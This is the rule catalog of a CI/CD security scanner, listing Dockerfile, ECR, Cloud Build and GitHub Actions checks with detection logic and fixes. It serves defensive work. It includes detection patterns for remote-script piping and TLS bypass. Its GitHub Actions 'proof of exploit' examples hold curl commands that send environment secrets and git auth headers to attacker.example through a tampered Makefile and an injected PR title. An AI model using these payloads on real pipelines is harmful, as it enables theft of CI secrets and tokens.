Recommendation. Don't COPY credential files into an image. Anything baked into a layer is recoverable by anyone who can pull the image, even if a later step deletes the file. For build-time secrets (npm tokens, registry credentials, SSH deploy keys), use RUN --mount=type=secret,id=<name> so the value lives only for the duration of the step. For runtime secrets, mount them from the orchestrator (Kubernetes Secret, ECS task role, Vault sidecar) instead.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Empty placeholder files (
.envshipped as a template,config.jsoncarrying only public flags). Suppress with a brief.pipelinecheckignorerationale and prefer an explicit non-secret name (.env.example).
Source: DF-019 in the Dockerfile provider.
DF-020: ARG declares a credential-named build argument HIGH 🔧 fix
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data.
How this is detected. Complements DF-006 (which flags an ENV/ARG with a literal credential-shaped value). This rule fires on the name alone, ARG NPM_TOKEN, ARG GITHUB_PAT, ARG DB_PASSWORD, even when no default is set, because BuildKit records the resolved value in the image's history the moment --build-arg supplies one. Names are matched via the same _primitives/secret_shapes regex used by the other secret-name rules.
Recommendation. Don't pass secrets through ARG. Build arguments are recorded in docker history whether the value comes from a default or from --build-arg at build time, so a credential-named ARG leaks the secret to anyone who can pull the image. Use RUN --mount=type=secret,id=<name> and feed the value with BuildKit's --secret flag, the secret never lands in a layer or in the build history.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- An
ARGwhose name matches the regex but is a non-secret config knob (a counter-example likeARG TOKEN_LIMIT). Rare; rename or suppress the finding with a brief rationale.
Source: DF-020 in the Dockerfile provider.
ECR-001: Image scanning on push not enabled HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. scan-on-push runs a CVE check against the image's OS package layers at the moment it lands in ECR. Without it, an image with a known CVE deploys silently. The ECR basic scanner is free; ECR-007 covers the Inspector v2 enhanced scanner that adds language-ecosystem CVEs (npm, pip, gem).
Recommendation. Enable imageScanningConfiguration.scanOnPush on the repository. Consider also enabling Amazon Inspector continuous scanning for ongoing CVE detection against images already in the registry.
Source: ECR-001 in the AWS provider.
ECR-002: Image tags are mutable HIGH
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked), 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Mutable tags mean :latest, :v1.0, and :stable can be re-pushed silently, the same tag points to different image content over time. Pinning by digest (sha256:...) in deployment manifests is the only durable reference; IMMUTABLE on the repo enforces the property registry-side so a forgotten digest reference doesn't drift.
Recommendation. Set imageTagMutability=IMMUTABLE on the repository. Reference images by digest (sha256:...) in deployment manifests for strongest immutability guarantees.
Source: ECR-002 in the AWS provider.
ECR-003: Repository policy allows public access CRITICAL
Evidences: 4.2.1 Ensure access to artifacts is limited, 4.3.3 Ensure package registries use authentication and authorisation.
How this is detected. A wildcard-principal repo policy means anyone on the internet can pull images. Sometimes intentional (a publicly-distributed base image), but should be a deliberate exposure, typically via the ECR Public registry rather than a private repo with a public policy. The default for build-output images should never be public.
Recommendation. Remove wildcard principals from the repository policy. Grant access only to specific AWS account IDs or IAM principals that require it.
Source: ECR-003 in the AWS provider.
ECR-004: No lifecycle policy configured LOW
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Without a lifecycle policy, untagged images and old tagged images accumulate indefinitely. Stale images keep CVE attack surface available, anyone who can pull from the repo can pull the old, unpatched version even after a newer build has shipped. Lifecycle expiry is the housekeeper that closes that window.
Recommendation. Add a lifecycle policy that expires untagged images after a short period (e.g. 7 days) and limits the number of tagged images retained, reducing exposure to images with known CVEs.
Source: ECR-004 in the AWS provider.
ECR-005: Repository encrypted with AES256 rather than KMS CMK MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Same shape as CP-002 / CWL-002 / CCM-002: AES256 (the AWS-managed default) gives confidentiality at rest but no key-policy or CloudTrail Decrypt-event story. Container images are arguably sensitive intellectual property, the same key-policy + audit shape as build outputs in S3 is warranted.
Recommendation. Set encryptionType=KMS with a customer-managed key ARN.
Source: ECR-005 in the AWS provider.
GCB-001: Cloud Build step image not pinned by digest HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Bare references (gcr.io/cloud-builders/docker) are treated as :latest by Cloud Build. Tag-only references (:20, :latest) count as unpinned. Only @sha256:… suffixes pass.
Recommendation. Pin every steps[].name image to an @sha256:<digest> suffix. gcr.io/cloud-builders/docker:latest is mutable; Google publishes new builder images frequently and the next build would pull whatever is current. Resolve the digest with gcloud artifacts docker images describe <ref> --format='value(image_summary.digest)' and pin it.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-001 in the Cloud Build provider.
GCB-002: Cloud Build uses the default service account HIGH
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. The default Cloud Build service account historically held roles/cloudbuild.builds.builder plus project-level editor in many organisations. Even under the GCP April-2024 default-identity change, the default SA is still broader than what a single pipeline needs. Explicit serviceAccount: is required to pass.
Recommendation. Create a dedicated service account for the build, grant it only the roles the pipeline actually needs (roles/artifactregistry.writer, roles/storage.objectCreator for artifact upload, etc.), and set serviceAccount: projects/<PROJECT>/serviceAccounts/<NAME>@.... Leaving it unset falls back to the default Cloud Build SA, which accumulates roles over a project's lifetime and is routinely granted roles/editor.
Source: GCB-002 in the Cloud Build provider.
GCB-003: Secret Manager value referenced in step args HIGH
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data.
How this is detected. Detection patterns: literal projects/<n>/secrets/<name>/versions/... URIs, gcloud secrets versions access shell invocations, and $(gcloud secrets …) command substitutions in step args or entrypoint.
Recommendation. Map the secret under availableSecrets.secretManager[] with an env: alias, then reference it from each step via secretEnv: [ALIAS]. Avoid inline gcloud secrets versions access in args, the resolved plaintext lands in build logs.
Source: GCB-003 in the Cloud Build provider.
GCB-004: dynamicSubstitutions on with user substitutions in step args HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. The _-prefix is Cloud Build's naming convention for user substitutions; they are editable via build trigger UI, gcloud builds submit --substitutions, and the REST API. Built-in substitutions ($PROJECT_ID, $COMMIT_SHA, $BUILD_ID) are derived from the trigger event and are not treated as user-controlled by this rule.
Recommendation. Either disable options.dynamicSubstitutions (it defaults to false) or move user substitutions ($_FOO) out of step args, pass them through env: and reference them inside a shell script the builder runs. Dynamic substitution re-evaluates bash syntax after variable expansion, giving trigger-config editors a script-injection channel.
Source: GCB-004 in the Cloud Build provider.
GCB-005: Build timeout unset or excessive LOW 🔧 fix
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data.
How this is detected. Cloud Build's default 10-minute timeout applies silently when timeout: is absent. Accepted format is <N>s (seconds); <N>m/<N>h forms are a gcloud convenience and are treated as malformed by the API.
Recommendation. Declare an explicit timeout: at the top of cloudbuild.yaml bounded to the build's realistic worst case (e.g. 1800s for most container builds). Explicit bounds shorten the window a compromised build can spend on a shared worker and flag regressions when a legitimate step slows down.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-005 in the Cloud Build provider.
GCB-006: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH
Evidences: 2.3.7 Ensure pipeline steps produce audit logs.
How this is detected. Complements GCB-004 (dynamicSubstitutions + user substitution in args). GCB-006 fires on intrinsically risky shell idioms, eval, sh -c "$X", backtick exec, regardless of whether the substitution source is currently trusted.
Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate or allow-list any value that must feed a dynamic command at the boundary. In Cloud Build these idioms typically appear in args: [-c, ...] entries under a bash entrypoint.
Known false positives.
eval "$(ssh-agent -s)"and similareval "$(<literal-tool>)"bootstrap idioms are intentionally NOT flagged, the substituted command is literal, only its output is eval'd.
Source: GCB-006 in the Cloud Build provider.
GCB-007: availableSecrets references versions/latest MEDIUM 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. versions/latest is documented as a rolling alias. A build run on Monday and a re-run on Tuesday can consume different secret bodies without any change to cloudbuild.yaml, breaking the reproducibility invariant that pinning protects.
Recommendation. Pin each availableSecrets.secretManager[].versionName to a specific version number (.../versions/7) rather than latest. Rotate by updating the number when a new version is promoted, not by silently publishing a new version that the next build pulls.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-007 in the Cloud Build provider.
GCB-008: No vulnerability scanning step in Cloud Build pipeline MEDIUM
Evidences: 2.4.2 Ensure pipeline integrity, artifacts are signed by the pipeline.
How this is detected. The detector matches tool names anywhere in the document, step images, args, or entrypoint strings. Container Analysis API scanning configured at the project level counts as compensating control but is out of scope for this YAML-only check; if you rely on it, suppress this rule via --checks.
Recommendation. Add a step that runs a vulnerability scanner, trivy, grype, snyk test, npm audit, pip-audit, osv-scanner, or govulncheck. In Cloud Build this typically looks like a step with name: aquasec/trivy or an entrypoint: bash step that invokes trivy image / grype <ref> on the built image.
Source: GCB-008 in the Cloud Build provider.
GCB-009: Artifacts not signed (no cosign / sigstore step) MEDIUM
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Silent-pass when the pipeline does not appear to produce artifacts (no docker push / gcloud run deploy / kubectl apply / etc. in any step). The detector matches cosign, sigstore, slsa-framework, and notation.
Recommendation. Add a signing step before images: is resolved, for example, a step with name: gcr.io/projectsigstore/cosign that runs cosign sign --yes <registry>/<repo>@<digest>. Pair with an attestation step (cosign attest --predicate sbom.json --type cyclonedx) so consumers can verify both the signature and the build provenance.
Source: GCB-009 in the Cloud Build provider.
GCB-010: Remote script piped to shell interpreter HIGH
Evidences: 2.1.6 Ensure build workers have minimal network connectivity.
How this is detected. Detects curl | bash, wget | sh, bash -c "$(curl …)", inline python -c urllib.urlopen, curl > x.sh && bash x.sh, and PowerShell irm | iex idioms. Vendor-trusted hosts (rustup.rs, get.docker.com, sdk.cloud.google.com, …) are still flagged at HIGH but the hit carries a vendor_trusted marker so dashboards can stratify known-vendor installers from arbitrary attacker URLs.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository and invoke it from the checkout, removing the network fetch removes the attacker-controllable content entirely.
Source: GCB-010 in the Cloud Build provider.
GCB-011: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Covers curl -k / wget --no-check-certificate, git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, PYTHONHTTPSVERIFY=0, GOINSECURE=, helm --insecure-skip-tls-verify, kubectl --insecure-skip-tls-verify, and ssh -o StrictHostKeyChecking=no.
Recommendation. Fix the underlying certificate issue, install the correct CA bundle into the step image, or point the tool at a mirror that presents a valid chain. Disabling verification trades a build error for a silent MITM window.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-011 in the Cloud Build provider.
GCB-012: Credential-shaped literal in pipeline body CRITICAL
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified.
How this is detected. Complements GCB-003 (inline gcloud secrets versions access) and GCB-007 (/versions/latest alias). This rule runs the shared credential-shape catalog against every string in the YAML. AWS keys, GitHub PATs, Slack webhooks, JWTs, PEM private key blocks, and any user-registered --secret-pattern regex. Known placeholders like EXAMPLE/CHANGEME are already filtered upstream so fixtures and docs don't false-match.
Recommendation. Rotate the exposed credential immediately. Move the value to availableSecrets.secretManager and reference it via secretEnv: so the plaintext never lands in the YAML or the build logs. For cloud access prefer workload-identity federation over long-lived keys.
Source: GCB-012 in the Cloud Build provider.
GCB-013: Package install bypasses registry integrity (git / path / tarball) MEDIUM
Evidences: 2.1.6 Ensure build workers have minimal network connectivity.
How this is detected. Complements GCB-012 (literal secrets) and GCB-010 (curl-pipe). Where those catch attacker content at fetch time, this rule catches installs that silently bypass the lockfile/registry integrity model, the build is technically reproducible but the source of truth is whatever the git ref / filesystem / tarball URL served most recently.
Recommendation. Pin git dependencies to a commit SHA (pip install git+https://…/repo@<sha>, cargo install --git … --rev <sha>). Publish private packages to Artifact Registry (or another internal registry) instead of installing from a filesystem path or tarball URL.
Source: GCB-013 in the Cloud Build provider.
GCB-014: Build logging disabled (options.logging: NONE) HIGH 🔧 fix
Evidences: 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. options.logging defaults to CLOUD_LOGGING_ONLY when omitted, which passes. Only the explicit NONE value (case- insensitive) trips this rule. GCS_ONLY / LEGACY pass. They persist logs, just to a different destination.
Recommendation. Remove the logging: NONE override, or replace it with CLOUD_LOGGING_ONLY / GCS_ONLY, so every step's stdout, stderr, and exit code is persisted. Loss of logs is a detection-and-response black hole; the storage cost is measured in cents.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-014 in the Cloud Build provider.
GCB-015: SBOM not produced (no CycloneDX / syft / Trivy-SBOM step) MEDIUM
Evidences: 2.4.2 Ensure pipeline integrity, artifacts are signed by the pipeline.
How this is detected. Complements GCB-009 (signing) and GCB-008 (vuln scanning). Without an SBOM, downstream consumers cannot audit the exact dependency set shipped in a Cloud Build image, delaying vulnerability response when a transitive dep is disclosed. Pairs naturally with cosign attest --type cyclonedx in a follow-up step.
Recommendation. Add an SBOM generation step, syft <image> -o cyclonedx-json, trivy image --format cyclonedx, and publish the resulting document alongside the image (typically via a cosign attestation so the SBOM travels with the artifact).
Source: GCB-015 in the Cloud Build provider.
GCB-016: Step dir field contains parent-directory escape (..) MEDIUM
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Cloud Build doesn't sandbox the dir: value beyond a join against /workspace. dir: ../etc resolves to /etc inside the builder container, which is rarely the intent. The check fires on any literal .. segment; single-dot ./ and absolute paths are fine.
Recommendation. Replace .. traversals in dir: with absolute paths rooted under /workspace (e.g. dir: /workspace/sub) or split the work across multiple steps that each set dir: to an exact subdirectory. The Cloud Build worker starts each step with the workspace mounted at /workspace; a .. escape from there reaches the builder image's root filesystem and any credentials the image carries.
Source: GCB-016 in the Cloud Build provider.
GCB-017: Image-producing build does not request SLSA provenance MEDIUM
Evidences: 2.3.7 Ensure pipeline steps produce audit logs.
How this is detected. SLSA Build Level 2 requires that the build platform produce signed provenance. Cloud Build's VERIFIED verify option is the documented way to opt in. The check is silent when the build does not produce an image (no top-level images: and no docker push / gcloud run deploy style steps); for those, signing and provenance aren't applicable.
Recommendation. Set options.requestedVerifyOption: VERIFIED on builds that publish container images. Cloud Build then emits a signed SLSA provenance attestation alongside the image, which downstream verifiers (Binary Authorization, cosign verify-attestation, gcloud artifacts docker images describe) can use to check that an image was built by the configured pipeline rather than smuggled in from elsewhere.
Source: GCB-017 in the Cloud Build provider.
GCB-018: Legacy KMS secrets block in use (prefer availableSecrets / Secret Manager) MEDIUM
Evidences: 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Cloud Build supports two secret-injection mechanisms. The older secrets: block carries KMS-encrypted ciphertext directly in the YAML; the cipher is decrypted at build time if the build's service account has cloudkms.cryptoKeyDecrypter on the key. The newer availableSecrets block references Secret Manager versions by URL, which is the documented modern approach. The legacy form still works, but rotating a value means re-encrypting and committing a new ciphertext.
Recommendation. Migrate from the top-level secrets: block (KMS-encrypted values stored inline in the YAML) to availableSecrets + Secret Manager. Replace each secrets[].secretEnv mapping with a versionName reference under availableSecrets.secretManager. Secret Manager rotates without re-encrypting and re-committing the YAML, scopes access via IAM rather than the KMS key's IAM, and produces an explicit audit log entry on every read.
Known false positives.
- Builds that use both forms during a migration trip the rule on the legacy block. That's intentional, finishing the migration is the fix.
Source: GCB-018 in the Cloud Build provider.
GCB-019: Shell entrypoint inlines a user substitution into args HIGH
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Distinct from GCB-004, which fires only when options.dynamicSubstitutions: true re-evaluates bash syntax after expansion. GCB-019 fires whenever a step uses a shell as its entrypoint AND a $_USER_VAR token lands inside args: Cloud Build expands the substitution before the step runs, and the shell then interprets any metacharacters the substitution carried, straight command injection through trigger configuration.
Recommendation. Pass user substitutions through env: (or secretEnv: for sensitive values) and reference them inside a checked-in shell script rather than splicing them directly into args. If the step truly needs to invoke shell logic inline, switch the entrypoint to the underlying tool (docker, gcloud, gsutil) and let the tool see the substitution as an argument, not as shell text.
Source: GCB-019 in the Cloud Build provider.
GCB-020: serviceAccount points at the default Cloud Build service account HIGH
Evidences: 4.2.1 Ensure access to artifacts is limited.
How this is detected. Complements GCB-002, which only fires when serviceAccount: is unset. This rule fires when an explicit value is set but still resolves to the project default, typically the email shape <digits>@cloudbuild.gserviceaccount.com, optionally wrapped in the projects/<id>/serviceAccounts/... URI form. The April-2024 GCP default-identity change kept the same SA shape; the broad-permissions concern remains.
Recommendation. Don't bind the build to <project-number>@cloudbuild.gserviceaccount.com. The default Cloud Build SA accumulates roles over a project's lifetime (commonly roles/editor or broad Artifact Registry / Secret Manager access). Create a dedicated SA per pipeline, grant only the roles the build actually needs, and reference it by its bespoke email (<name>@<project>.iam.gserviceaccount.com). Revoking a compromised pipeline then doesn't unbind every other build in the project.
Known false positives.
- Single-pipeline GCP projects where the default SA's roles are actively scoped down. Rare in practice; create a named SA anyway so the audit log stays unambiguous about which pipeline made each API call.
Source: GCB-020 in the Cloud Build provider.
GCB-021: No private worker pool, build runs on the shared default pool MEDIUM 🔧 fix
Evidences: 2.1.6 Ensure build workers have minimal network connectivity.
How this is detected. Cloud Build runs in a shared Google-managed pool by default. Switching to a private worker pool is the prerequisite for every other network-perimeter control: egress restriction to specific peered networks, ingress blocking of public endpoints, and traffic interoperation with VPC Service Controls. Both options.pool.name and the legacy options.workerPool field are accepted.
Recommendation. Set options.pool.name: projects/<PROJECT>/locations/<REGION>/workerPools/<NAME> to bind the build to a private worker pool inside your VPC. The default pool runs on a shared Google-managed network with public-internet egress and ingress paths Google chooses, which makes egress filtering, VPC-SC perimeters, and source-IP allowlists on internal endpoints impossible. A private pool also gives you the option to disable external IPs and to log the build's network activity through your own VPC flow logs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- OSS / sample / one-off builds that legitimately have no private network and no internal endpoints to protect. Suppress with a brief
.pipelinecheckignorerationale rather than disabling at the catalog level.
Source: GCB-021 in the Cloud Build provider.
GCB-022: options.substitutionOption set to ALLOW_LOOSE LOW 🔧 fix
Evidences: 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. Cloud Build accepts two values for options.substitutionOption: MUST_MATCH (default, any undefined $_VAR reference fails the build at parse time) and ALLOW_LOOSE (undefined references silently expand to ""). The default is the safer setting; this rule only fires on the explicit ALLOW_LOOSE opt-in. Builds that genuinely depend on optional substitutions should pass them through substitutions: defaults, not rely on silent empty-string fallback.
Recommendation. Drop options.substitutionOption (the default is MUST_MATCH) or set it explicitly to MUST_MATCH. ALLOW_LOOSE makes Cloud Build expand undefined substitutions to the empty string instead of failing the build. That paper-overs typos ($_REGON instead of $_REGION), masks unset variables that should have tripped review, and combined with dynamicSubstitutions: true (GCB-004) it widens the command-injection surface by letting attacker-controlled substitution tokens collapse to empty strings inside shell commands.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Migration scenarios where a long-running pipeline pre-dates MUST_MATCH and the operator needs ALLOW_LOOSE temporarily. Suppress with a brief
.pipelinecheckignorerationale and anexpires:date so the waiver doesn't outlive the migration.
Source: GCB-022 in the Cloud Build provider.
GCB-023: Step references a user substitution not declared in substitutions: MEDIUM
Evidences: 2.4.2 Ensure pipeline integrity, artifacts are signed by the pipeline.
How this is detected. Walks every step's args: / entrypoint: / env: / dir: / id: / waitFor: for $_NAME tokens (Cloud Build's user-substitution syntax is leading underscore + uppercase / digits / underscore) and cross-references against the top-level substitutions: mapping. Built-in substitutions ($PROJECT_ID, $REPO_NAME, $BRANCH_NAME, $TAG_NAME, $COMMIT_SHA, $SHORT_SHA, $REVISION_ID, $BUILD_ID, $LOCATION, $TRIGGER_NAME, $_HEAD_*, $_BASE_*, $_PR_NUMBER and the $_HEAD_REPO_URL family) are Cloud Build server-set and don't appear in substitutions:; the rule allow-lists them so they don't false-positive.
Recommendation. Add an entry for every $_USER_VAR referenced anywhere in the build to the top-level substitutions: block, either with a sensible default or with an empty string if the trigger always supplies the value. Cloud Build's default options.substitutionOption: MUST_MATCH then fails the build at parse time on undeclared references (catching typos at the gate). With the looser ALLOW_LOOSE opt-in (GCB-022) undeclared references silently expand to the empty string, which masks the bug and quietly broadens any shell command that interpolates the value.
Source: GCB-023 in the Cloud Build provider.
GCB-024: Build pushes Docker images but top-level images: is empty LOW
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Walks step args / entrypoint / cmd looking for docker push (or the buildx imagetools push variant) invocations. When the build has at least one such step but the top-level images: field is missing or empty, fires. Steps that build and push via the gcr.io/cloud-builders/docker builder image are the common case; --push flags on buildx build are also detected. kaniko and buildah push idioms aren't currently detected. Those are different builder images entirely.
Recommendation. Add every image the build produces to the top-level images: array (e.g. images: ['gcr.io/$PROJECT_ID/myapp:$COMMIT_SHA']). Cloud Build then verifies the push succeeded before marking the build SUCCESS, records the image in the build's metadata for provenance / Binary Authorization attestation, and surfaces the image in the builds.list --image query. Without it, a push that happens inside a step is invisible to Cloud Build's tracking layer even though the image still lands in the registry.
Known false positives.
- Multi-stage builds where one step pushes an intermediate image to a private cache registry and the final stage pushes the production artifact (which IS in
images:) would trip this rule on the cache push. Suppress with--ignore-filewhen this matches.
Source: GCB-024 in the Cloud Build provider.
GCB-025: Build has no tags for audit / discoverability LOW
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified.
How this is detected. Cloud Build tags are user-defined labels attached to a build. They appear in the build's metadata (tags: field on the Build resource), in every Cloud Logging audit event for the build, and as a filter argument to gcloud builds list --filter='tags:<value>'. Substitution-bearing tags ($BRANCH_NAME, $COMMIT_SHA) count as populated. Cloud Build expands them at submission time.
Recommendation. Add a top-level tags: array to every cloudbuild.yaml, at minimum, an environment tag (prod / staging / dev) and a service tag (backend / frontend / infra). Cloud Build records tags in the build metadata and Cloud Logging entries so post-incident triage of which build emitted this becomes a single gcloud builds list --filter='tags:prod' query. Without tags, builds discoverable only by build-id; the id is a UUID with no signal.
Known false positives.
- Single-purpose project-local builds in a sandbox project may legitimately not need tags. Suppress with
--ignore-fileif that matches.
Source: GCB-025 in the Cloud Build provider.
GCB-026: Step waitFor: references an unknown step id MEDIUM
Evidences: 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Cloud Build's step dependency graph is built from each step's waitFor: array. A step with no waitFor: runs after all previous steps; a step with waitFor: ['-'] runs at the start of the build; a step with waitFor: ['<id>'] waits for the specific step. There's no validation that the referenced id exists, typo'd ids are silently treated like - (no-wait), so the dependency disappears without warning. This rule catches the silent-skip by walking every waitFor: value and cross-referencing it against the set of declared step ids.
Recommendation. Verify every ID listed in a step's waitFor: array matches an id: declared on a sibling step in the same build. The special token - (start at the beginning of the build, no dependencies) is the only non-id value Cloud Build accepts. A typo in waitFor: doesn't fail the build, Cloud Build silently skips the wait, so a step that was supposed to run after a setup step ends up running in parallel with it.
Source: GCB-026 in the Cloud Build provider.
GHA-001: Action not pinned to commit SHA HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Every uses: reference should pin a specific 40-char commit SHA. Tag and branch refs (@v4, @main) can be silently moved to malicious commits by whoever controls the upstream repository, a third-party action compromise will propagate into the pipeline on the next run.
Recommendation. Replace tag/branch references (@v4, @main) with the full 40-char commit SHA. Use Dependabot or StepSecurity to keep the pins fresh.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- tj-actions/changed-files compromise (CVE-2025-30066, March 2025): a malicious commit retagged behind
@v1/@v45shipped CI-secret exfiltration to roughly 23,000 repos that had pinned the action to a mutable tag instead of a commit SHA. - reviewdog/action-setup compromise (CVE-2025-30154, March 2025): same week, similar mechanism. Tag-pinned consumers auto-pulled the malicious version; SHA-pinned consumers were unaffected.
Proof of exploit.
Tag-pinned reference (vulnerable):
- uses: tj-actions/changed-files@v45
Attack: the upstream maintainer (or anyone who compromises
the upstream repo) force-moves the v45 tag to a malicious
commit:
git tag -f v45
git push --force origin v45
Every consumer's next workflow run pulls the new code
automatically, executing the attacker's payload with the
job's secrets and GITHUB_TOKEN in scope.
Safe: pin to a 40-char commit SHA (immutable):
- uses: tj-actions/changed-files@a284dc1 # v45.0.0
Source: GHA-001 in the GitHub Actions provider.
GHA-002: pull_request_target checks out PR head CRITICAL 🔧 fix
Evidences: 2.1.3 Ensure the build environment is hardened, 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. pull_request_target runs with a write-scope GITHUB_TOKEN and access to repository secrets, deliberately so, since it's how labeling and comment-bot workflows work. When the same workflow then explicitly checks out the PR head (ref: ${{ github.event.pull_request.head.sha }} or .ref) it executes attacker-controlled code with those privileges.
Recommendation. Use pull_request instead of pull_request_target for any workflow that must run untrusted code. If you need write scope, split the workflow: a pull_request_target job that labels the PR, and a separate pull_request-triggered job that builds it with read-only secrets.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- GitHub Security Lab: Preventing pwn requests (2020), the canonical write-up. Demonstrates how a fork PR that lands in a
pull_request_targetworkflow with the PR head checked out runs in the base repo's privileged context. - Trail of Bits
Codecov-style supply chain via pwn requests(2021): showed the primitive against widely-used Actions workflows. The fix pattern (split the workflow into a privileged labeler + an unprivileged builder) is now standard guidance.
Proof of exploit.
Vulnerable: pull_request_target + checkout PR head =
attacker code runs with secrets + write-scope token.
name: build-pr
on:
pull_request_target:
branches: [main]
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@
Attack: any external contributor opens a fork PR with a
tampered Makefile:
test:
# curl -X POST https://attacker.example/exfil \ # -d "$(env)" \
-d "$(git config --get-all http.https://github.com/.extraheader)"
CI runs the malicious target with the base repo's secrets
(every ${{ secrets.* }} the workflow has access to) and a
write-scope GITHUB_TOKEN. The PR doesn't even need to be
merged or reviewed — the privileged execution happens at
PR-open time.
Safe: split the workflow. The labeler runs with secrets
but never checks out PR head; the builder runs in
pull_request context with no secrets:
name: triage # privileged half on: { pull_request_target: { types: [opened, synchronize] } } jobs: label: runs-on: ubuntu-latest steps: - run: gh pr edit ${{ github.event.number }} --add-label triage env: GH_TOKEN: ${{ github.token }}
name: build # unprivileged half
on: { pull_request: {} }
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@
Source: GHA-002 in the GitHub Actions provider.
GHA-003: Script injection via untrusted context HIGH 🔧 fix
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Interpolating attacker-controlled context fields (PR title/body, issue body, comment body, commit message, discussion body, head branch name, github.ref_name, inputs.*, release metadata, deployment payloads) directly into a run: block is shell injection. GitHub expands ${{ ... }} BEFORE shell quoting, so any backtick, $(), or ; in the source field executes.
Recommendation. Pass untrusted values through an intermediate env: variable and reference that variable from the shell script. GitHub's expression evaluation happens before shell quoting, so inline ${{ github.event.* }} is always unsafe.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- GitHub Security Lab disclosure (2020): a sweep of public Actions found dozens of widely-used workflows interpolating
github.event.issue.title/pull_request.titledirectly into shell. Any commenter or PR author could run arbitrary commands in the maintainer's CI. - Trail of Bits
pwn-requestresearch (2021): demonstrated the same primitive againstpull_request_targetworkflows where the runner has secrets and a write-scope token; one fork PR could exfiltrate every secret the workflow could see. Mitigation is the same: never interpolate context into shell, route throughenv:.
Proof of exploit.
Vulnerable: PR title interpolated straight into shell.
name: triage on: pull_request_target: types: [opened, edited] jobs: greet: runs-on: ubuntu-latest steps: - run: | echo "New PR: ${{ github.event.pull_request.title }}"
Attack: open a PR with the title:
# foo"; curl -X POST https://attacker.example/exfil \
-d "$(env | base64 -w0)"; echo "
GitHub expands ${{ ... }} BEFORE shell quoting, so the
title's " closes the echo string and the rest of the line
becomes shell. The pull_request_target trigger means the
runner already has secrets and a write-scope GITHUB_TOKEN,
so the curl exfils every secret the workflow can see.
Safe: route through env so the value is never interpolated
into the shell template:
- env:
PR_TITLE: ${{ github.event.pull_request.title }}
run: |
echo "New PR: $PR_TITLE"
